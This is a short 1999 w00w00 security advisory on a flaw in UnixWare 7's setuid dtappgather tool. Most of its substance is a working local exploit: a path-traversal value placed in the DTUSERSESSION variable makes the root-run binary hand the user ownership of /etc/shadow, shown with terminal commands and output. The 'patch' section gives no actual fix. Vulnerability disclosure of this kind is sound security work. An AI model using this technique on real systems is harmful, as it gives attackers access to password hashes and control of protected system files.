Subject: [w00giving '99] UnixWare 7's dtappgather

w00w00 Security Development (WSD)
Discovered by: K2 (ktwo@ktwo.ca)

UnixWare 7's dtappgather runs with superuser privileges, but improperly
check $DTUSERSESSION to ensure that the file is readable/writeable or
owned by the user running it.

---------------------------------------------------------------------------
Exploit:

rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow
rain:/usr/dt/bin$ ./dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File
exists
rain:/usr/dt/bin$ ls -la /etc/shadow
-r-xr-xr-x   1 ktwo     other         358 Oct 26 04:37 /etc/shadow*

---------------------------------------------------------------------------
Patch:

Because SCO doesn't distribute source code for Unixware, we
must disassemble the binaries and insert bytes.

---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and
interrupt

People who deserve hellos: nocarrier, minus, daveg, rosieriv, nny, marc,
and w00god blake



Back to Advisories
Back to w00w00 webpage